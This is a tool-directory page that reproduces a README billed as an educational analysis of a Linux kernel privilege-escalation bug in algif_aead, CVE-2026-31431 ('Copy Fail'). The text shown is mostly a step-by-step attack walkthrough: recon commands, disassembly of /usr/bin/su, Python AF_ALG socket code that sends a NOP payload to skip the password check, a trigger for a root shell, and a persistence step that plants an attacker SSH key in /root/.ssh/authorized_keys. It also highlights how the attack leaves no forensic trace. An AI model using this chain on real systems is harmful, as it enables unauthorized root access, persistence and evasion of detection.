Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/krish-foren6/cve-2026-31431-report-copy-fail-vulnerability-
Privilege EscalationMemory ForensicsVulnerability AnalysisExploitationLearning & EducationIncident ResponseContainer Escape
GitHubkrish-foren6/cve-2026-31431-report-copy-fail-vulnerability-

CVE-2026-31431-Report-Copy-fail-Vulnerability-

Detailed analysis of the Copy Fail vulnerability (CVE-2026-31431) in the Linux kernel, including memory corruption mechanism, privilege escalation flow, and security impact.

View Repository
1275 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-31431 — Copy Fail: Linux Kernel Privilege Escalation

CVE CVSS Kernel Type Purpose

Educational analysis of the Copy Fail vulnerability in the Linux kernel.
Covers the memory corruption mechanism, privilege escalation flow, container escape, and defensive countermeasures.


⚠️ Disclaimer

This repository is for educational and research purposes only.
Do not use this information on systems you do not own or have explicit written permission to test.
All code snippets and commands are provided strictly to aid understanding of Linux kernel internals.


Table of Contents

  • Overview
  • Vulnerability Identity Card
  • Background Concepts
  • How the Bug Works
  • Complete Attack Flow
  • Why It Is So Dangerous
  • Safe Practical Observation
  • Defense & Detection
  • Comparison with Similar CVEs
  • Glossary
  • Quick Reference

Overview

CVE-2026-31431, also known as Copy Fail, is a Linux kernel vulnerability where an unprivileged local user can escalate to root without any special permissions.

The attack operates entirely in RAM. The disk file is never touched — meaning file hashes stay clean, timestamps are unchanged, and audit logs record nothing. When the system reboots, all evidence disappears.

Normal user  →  exploit algif_aead bug  →  overwrite page cache  →  root

Key properties:

  • ✅ No race condition — works reliably every time
  • ✅ Disk untouched — forensics find nothing
  • ✅ Requires only a standard local user account
  • ✅ Enables container escape via shared page cache

Vulnerability Identity Card

FieldValue
CVE IDCVE-2026-31431
Common NameCopy Fail / algif_aead Page Cache Corruption
CVSS v3.1 Score7.8 — CRITICAL
Attack TypeLocal Privilege Escalation (LPE)
Affected Kernel VersionsLinux 5.10 through 6.8 (approx.)
Vulnerable Componentcrypto/algif_aead.c — AF_ALG socket interface
Exploitation ReliabilityHIGH — No race condition required
Disk EvidenceNONE — RAM-only modification
Container ImpactYES — Host escape via shared page cache
Patch StatusAvailable (upstream kernel patch released)

Background Concepts

/usr/bin/su — The Target Binary

su (Switch User) allows a user to switch to another account — typically root. It is a SetUID binary:

ls -l /usr/bin/su
# -rwsr-xr-x 1 root root 68208 Jan 1 2026 /usr/bin/su
#   ^-- 's' = SetUID flag

The s flag means: when any user runs this binary, it executes with root's permissions. This makes it a high-value target.

Its internal logic (simplified):

if (password_correct()) {
    give_root_access();
} else {
    deny_access();
}

The attack goal: skip the password_correct() check entirely.


RAM and Page Cache

When Linux reads a file from disk, it keeps a copy in RAM called the page cache.

ComponentDescription
DiskOriginal file on disk (the library shelf)
Page CacheRAM copy of the file (the photocopy on your desk)
CPUReads and executes from the page cache — fast
AttackerModifies the RAM copy; disk stays untouched
cat /proc/meminfo | grep Cached
# Cached: 1234567 kB  ← this is the page cache

Buffer and Safe Buffer

TypeSecurity
Safe Buffer — kernel-allocated, size and boundary controlled✅ OK
Page Cache — file-backed RAM copy, shared, executable⚠️ DANGEROUS if written to
Wrong Pointer — bug-caused address pointing anywhere🔴 CRITICAL

AF_ALG and algif_aead

AF_ALG (Algorithm Family) is a Linux socket interface that lets user-space programs use kernel crypto functions (AES, SHA, AEAD).

socket(AF_ALG, SOCK_SEQPACKET, 0);  // open a crypto socket

algif_aead is the kernel module handling AEAD encryption (e.g. AES-GCM) through AF_ALG. The vulnerability lives in its data copy step.

AF_ALG  →  algif_aead  →  AES-GCM engine  →  output buffer
                                ↑
                           BUG IS HERE

How the Bug Works

The bug is not in the encryption logic. It is in memory handling — the wrong memory region is selected during a data copy.

Normal flow (no bug):

destination = safe_output_buffer;       // correct location
memcpy(destination, user_data, size);   // data safely written

Vulnerable flow (with bug):

destination = buffer + WRONG_OFFSET;    // BUG: wrong pointer!
memcpy(destination, user_data, size);   // data lands in page cache

The kernel was supposed to write to the safe output buffer. Due to a miscalculated offset, it writes to the page cache — which holds the RAM copy of /usr/bin/su.

What the attacker changes in memory

The binary contains x86-64 machine code. The attacker targets the conditional jump that triggers auth failure:

Before attack:

cmp  eax, 0     ; check return value
jne  0x1234     ; if fail → jump to deny
call give_root  ; grant root

After attack (2 bytes changed in RAM):

cmp  eax, 0     ; same
90 90           ; NOP NOP ← jump replaced, check skipped!
call give_root  ; CPU lands here directly

NOP = No Operation. The CPU does nothing and moves forward — skipping the authentication check entirely.


Complete Attack Flow

Pre-Attack Mindset

"I only need a normal user account. The kernel will make the mistake itself.
Disk stays clean. No logs. Works every time."

Step 0 — Reconnaissance

whoami && id
# uid=1000(user) gid=1000(user) ← normal user

uname -r
# 6.1.0-generic ← within vulnerable range

ls -la /usr/bin/su
# -rwsr-xr-x root root ← SetUID confirmed

python3 -c "import socket; s = socket.socket(socket.AF_ALG); print('AF_ALG available')"

Step 1 — Load File into Page Cache

cat /usr/bin/su > /dev/null
# /usr/bin/su is now loaded into page cache ✓

Step 2 — Reverse Engineer the Binary

xxd /usr/bin/su | head -50
objdump -d /usr/bin/su | grep -A 20 'check\|auth\|pass'
readelf -h /usr/bin/su

Looking for: the auth function address, the jne/jnz conditional jump, and its exact byte offset.

Step 3 — Open AF_ALG Socket

import socket, struct

sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
sock.bind(('aead', 'gcm(aes)', 0, 16))
sock.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b'A' * 16)

Step 4 — Send Crafted Payload

payload = b'\x90\x90'  # NOP NOP — replaces the conditional jump
conn = sock.accept()
conn[0].sendmsg([payload], [(socket.SOL_ALG, socket.ALG_SET_IV, ...)])

Step 5 — Kernel Overwrites Page Cache

# Kernel internally (simplified):
destination = buffer + crafted_offset  # BUG: wrong pointer
memcpy(destination, payload, 2)        # NOP bytes written into page cache
# /usr/bin/su's password check is now NOP NOP in RAM

Step 6 — Trigger

su
# Password: (anything — or just press Enter)
# root@victim:/# ← ROOT OBTAINED

What happened: System executed /usr/bin/su from RAM. The password check was NOP. CPU skipped it. give_root() was called directly.

Step 7 — Persistence (Optional)

echo 'attacker_public_key' >> /root/.ssh/authorized_keys
Download Tool